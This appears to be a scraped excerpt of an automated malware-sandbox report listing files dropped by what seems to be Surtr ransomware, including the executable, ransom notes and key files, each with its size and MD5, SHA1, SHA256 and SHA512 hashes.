                                                                                                                                                                                                                                                                    PID:4652

                                                                                                                                                                                                                                                                  Network

                                                                                                                                                                                                                                                                  MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                  Replay Monitor

                                                                                                                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                                                                                                                  Downloads

                                                                                                                                                                                                                                                                  • C:\ProgramData\Service\ID_DATA.surt

                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    14B

                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    ac2482790f450a312b815c9cb626b8b0

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    ed7ba49134cc34559782299113905987059f8398

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    f4571eecc1bd9d434a08a94951ac6ad21ce4fa077e0285ab65bcf47520bc8439

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    987634ca5807b931b321a9dea1d8ec0f86f160be20cae5ef68321a066eb747d501ad00ae8d1d4907df0dc11f72966fa1c5a8fe15096c0822cfbc8e6e0cc42dfc

                                                                                                                                                                                                                                                                  • C:\ProgramData\Service\PrivateData_okvd1x8i6h1pch.surt

                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    1KB

                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    00aab5ee8f393aace7360207b8aabeb3

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    e8e830b02a7222e52b93f86a3a17f967229f4ef2

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    0ef09a4ae509fa75acb1866fdeb71765e3c46580a97f4f90c1154c8c188eb983

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    dd1c652e715944008c72fdce8ec427f3f7923232e8f8dee7c80ef28435875af49d547cf4eda2a49a417009cda54559a1dd8b7c0436dff6333ba0040ab11907d3

                                                                                                                                                                                                                                                                  • C:\ProgramData\Service\PublicData_okvd1x8i6h1pch.surt

                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    204B

                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    88026b24f0fd058b16f346f6a20012d3

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    562a904453c24c1eee10a7f161e81cac9b94a986

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    ee0cc4cd2fee0a86d517c91444693f2ddb6c4550f1d05abea1c0f2054e72f27b

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    764d237c5c0cfc3e9a6748bcf06b060d896f86226eb7311e717cc3915107893371322168e40a8dddf0b3e455110a4b6b056d20056134f2106bd115853dc6897b

                                                                                                                                                                                                                                                                  • C:\ProgramData\Service\SURTR_README.hta

                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    8KB

                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    6dabcfdee3f5ab57c980ef98b2ac8a34

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    93d0d3b54b42d354e9157739e2b53fe991e53e6f

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    881dcebddd6f985f68d989f8a19950e839bc10990f350a5773cd6f89a4d6521a

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    6300ceb14fccc1889f2822d3bc00c74ad2a3603e6c3d8e0a4501bf2f6f559475e1c530259fcf64d9568ce821cab66c78f62f7f55dccda3e5a4d3c6e0ed05d538

                                                                                                                                                                                                                                                                  • C:\ProgramData\Service\SURTR_README.txt

                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    617B

                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    0c6b9b75bd29a1c2b59d4f47d74cffb0

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    7f7fb5de86370cae4778f59da7f5e682587e2959

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    6904dffadf405e2a0a18d3c9d042bf6ea4773dc106976b7cb67fadf09a128775

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    a30912a88130c411ad48452a00de8bbc998744ac23ec62e9a7693b6bb5698a8fe3d53dd3c9a4d7a64c1f0610fc52292b247389c3f6e0f01a8d614ce4a4bc9bd0

                                                                                                                                                                                                                                                                  • C:\ProgramData\Service\Surtr.exe

                                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                                    1.1MB

                                                                                                                                                                                                                                                                    MD5

                                                                                                                                                                                                                                                                    674e7ee905d24a89af47b53b53ffc23c

                                                                                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                                                                                    c6b73b882aa1f4d46ec655a5591a28638700856c

                                                                                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                                                                                    32f9e35d861d166a7ae22eb24f50ab0fb1adedc9f1ae5f1ce2c76e3268b2b4c1

                                                                                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                                                                                    6a0623742423f2137a0a9285e6a590659f8436eeb1fd7c9bcb5e16ecbffa949ae82cf59ee9a49e614345b559a581cfe23c87afce028d1927335dc4938a9b0408